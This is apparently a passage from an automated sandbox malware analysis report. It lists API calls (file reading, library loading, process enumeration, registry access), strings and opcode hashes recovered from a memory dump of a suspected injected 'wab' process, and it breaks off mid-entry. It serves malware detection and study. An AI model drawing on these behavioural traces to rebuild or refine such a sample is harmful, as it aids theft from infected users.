                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp
                  • String ID: /stext
                  • API String ID: 2081463915-3817206916
                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp
                  • String ID: .Wu
                  • API String ID: 2081463915-3424199868
                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                  • String ID:
                  • API String ID: 159017214-0
                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 3150196962-0
                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                  APIs
                  Strings
                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: malloc
                  • String ID: failed to allocate %u bytes of memory
                  • API String ID: 2803490479-1168259600
                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmpmemset
                  • String ID:
                  • API String ID: 1065087418-0
                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                  APIs
                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                    • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                  • String ID:
                  • API String ID: 1481295809-0
                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                  APIs
                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 3150196962-0
                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                  APIs
                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$PointerRead
                  • String ID:
                  • API String ID: 3154509469-0
                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                  APIs
                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfile$StringWrite_itowmemset
                  • String ID:
                  • API String ID: 4232544981-0
                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                  APIs
                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                  APIs
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$FileModuleName
                  • String ID:
                  • API String ID: 3859505661-0
                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                  APIs
                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                  APIs
                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                  APIs
                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                  APIs
                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                  APIs
                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: EnumNamesResource
                  • String ID:
                  • API String ID: 3334572018-0
                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                  APIs
                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                  APIs
                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
